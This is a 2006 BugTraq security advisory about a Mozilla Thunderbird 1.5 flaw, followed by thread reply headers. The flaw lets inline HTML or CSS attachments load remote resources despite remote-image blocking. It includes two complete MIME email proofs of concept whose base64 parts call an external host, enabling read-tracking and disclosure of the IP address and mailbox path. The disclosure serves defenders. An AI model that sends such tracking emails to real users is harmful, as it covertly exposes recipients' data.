BugTraq
Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities Feb 28 2006 06:59PM
Renaud Lifchitz (r lifchitz sysdream com) (2 replies)
Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

//----- Advisory

Program : Mozilla Thunderbird
Homepage : http://www.mozilla.com/thunderbird/
Tested version : 1.5
Found by : crashfr at sysdream dot com
This advisory : crashfr at sysdream dot com
Discovery date : 2006/02/18

//----- Application description

Full-Featured Email

Simple to use, powerful, and customizable, Thunderbird is a full-featured
email application. Thunderbird supports IMAP and POP mail protocols, as well
as HTML mail formatting. Easily import your existing email accounts and
messages. Built-in RSS capabilities, powerful quick search, spell check
as you
type, global inbox, deleting attachments and advanced message filtering
round
out Thunderbird's modern feature set.

//----- Description of vulnerability

Thunderbird's HTML rendering engine insufficiently filters the loading
of external resources from inline HTML attachments. External files are
downloaded even if the "Block loading of remote images in mail messages"
option is enabled.

//----- Proof Of Concept

* Iframe Exploit :

Subject: Thunploit by CrashFr !
From: CrashFr<crashfr (at) chez (dot) com [email concealed]>
To: CrashFr<crashfr (at) chez (dot) com [email concealed]>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af (at) sysdream (dot) com [email concealed]" width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af (at) sysdream (dot) com [email concealed]>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzog
MHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIg
d2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0i
MCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--

* CSS Exploit :

Subject: Thunploit by CrashFr !
From: CrashFr<crashfr (at) chez (dot) com [email concealed]>
To: CrashFr<crashfr (at) chez (dot) com [email concealed]>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af (at) sysdream (dot) com [email concealed]" /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af (at) sysdream (dot) com [email concealed]>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsg
YmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--

//----- Impact

Successful exploitation may lead to information disclosure (user agent:
application version & platform, IP address...). A spammer can easily
check if an email is read. Moreover, an HTML reply to those types of
emails will contain the complete url path to the mailbox
(ie: mailbox:///C%7C/Documents%20and%20Settings/CrashFr/
Application%20Data/Thunderbird/Profiles/7jko3in9.default/
Mail/Local%20Folders/Inbox?number=2194930&header=quotebody&part=
1.2&filename=basic.css").

//----- Solution

No known solution. You have to wait for a vendor upgrade.

//----- Credits

http://www.sysdream.com
crashfr at sysdream dot com

//----- Greetings

nono2357 & the hackademy ...

[ reply ]
Re: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities Feb 28 2006 11:57PM
Steve Shockley (steve shockley shockley net)
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities Feb 28 2006 10:17PM
Daniel Veditz (dveditz cruzio com) (4 replies)
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities Mar 01 2006 08:23PM
Nick Boyce (nick boyce gmail com) (1 replies)
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities Feb 28 2006 10:57PM
Renaud Lifchitz (r lifchitz sysdream com)


 

Privacy Statement
Copyright 2010, SecurityFocus